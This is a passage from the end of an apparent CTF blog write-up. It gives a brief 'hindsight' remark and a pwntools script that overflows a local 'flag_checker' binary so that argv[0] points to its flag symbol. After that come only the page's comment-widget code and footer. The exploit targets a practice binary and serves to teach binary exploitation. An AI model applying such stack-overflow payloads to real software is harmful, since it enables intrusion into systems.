</span></span></code></pre></div><h2 id=hindsight>Hindsight</h2><p>After the CTF <em>(and after writing this post)</em>, I realised that there was no need to look into the <code>getenv</code> function, since you can just overflow enough to overflow argv[0] but not overflow the environment block.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=kn>from</span> <span class=nn>pwn</span> <span class=kn>import</span> <span class=o>*</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>elf</span> <span class=o>=</span> <span class=n>ELF</span><span class=p>(</span><span class=s2>&#34;./flag_checker&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>p</span> <span class=o>=</span> <span class=n>process</span><span class=p>(</span><span class=s2>&#34;./flag_checker&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>sendline</span><span class=p>(</span><span class=n>fit</span><span class=p>({</span><span class=mi>312</span><span class=p>:</span> <span class=n>p64</span><span class=p>(</span><span class=n>elf</span><span class=o>.</span><span class=n>sym</span><span class=o>.</span><span class=n>flag</span><span class=p>)}))</span> <span class=c1># argv[0] == flag</span>
</span></span><span class=line><span class=cl>                <span class=c1>#328: p64(0)}))           # unnecessary</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>interactive</span><span class=p>()</span>
</span></span></code></pre></div></div></article><hr style=margin-top:40px;margin-bottom:40px><div id=disqus_thread></div><script>window.disqus_config=function(){},function(){if(["localhost","127.0.0.1"].indexOf(window.location.hostname)!=-1){document.getElementById("disqus_thread").innerHTML="Disqus comments not available by default when the website is previewed locally.";return}var t=document,e=t.createElement("script");e.async=!0,e.src="//caprinux.disqus.com/embed.js",e.setAttribute("data-timestamp",+new Date),(t.head||t.body).appendChild(e)}()</script><noscript>Please enable JavaScript to view the <a href=https://disqus.com/?ref_noscript>comments powered by Disqus.</a></noscript><a href=https://disqus.com class=dsq-brlink>comments powered by <span class=logo-disqus>Disqus</span></a></main></div><footer class=footer><span class=footer_item></span>&nbsp;<div class=footer_social-icons><a href=https://github.com/caprinux target=_blank rel="noopener noreferrer me" title=Github><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37.0 00-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44.0 0020 4.77 5.07 5.07.0 0019.91 1S18.73.65 16 2.48a13.38 13.38.0 00-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07.0 005 4.77 5.44 5.44.0 003.5 8.55c0 5.42 3.3 6.61 6.44 7A3.37 3.37.0 009 18.13V22"/></svg>
</a><a href=https://x.com/elma_ios target=_blank rel="noopener noreferrer me" title=Twitter><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M23 3a10.9 10.9.0 01-3.14 1.53 4.48 4.48.0 00-7.86 3v1A10.66 10.66.0 013 4s-4 9 5 13a11.64 11.64.0 01-7 2c9 5 20 0 20-11.5a4.5 4.5.0 00-.08-.83A7.72 7.72.0 0023 3z"/></svg>
</a><a href=index.xml target=_blank rel="noopener noreferrer me" title=Rss><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M4 11a9 9 0 019 9"/><path d="M4 4a16 16 0 0116 16"/><circle cx="5" cy="19" r="1"/></svg></a></div><small class=footer_copyright>© 2024 elma.
Powered by <a href=https://github.com/hugo-sid/hugo-blog-awesome target=_blank rel=noopener>Hugo blog awesome</a>.</small></footer><a href=# title="Go to top" id=totop><svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="currentcolor" stroke="currentcolor" viewBox="0 96 960 960"><path d="M283 704.739 234.261 656 480 410.261 725.739 656 677 704.739l-197-197-197 197z"/></svg>
</a><script src=https://blog.caprinux.com/js/main.min.35f435a5d8eac613c52daa28d8af544a4512337d3e95236e4a4978417b8dcb2f.js integrity="sha256-NfQ1pdjqxhPFLaoo2K9USkUSM30+lSNuSkl4QXuNyy8="></script></body></html>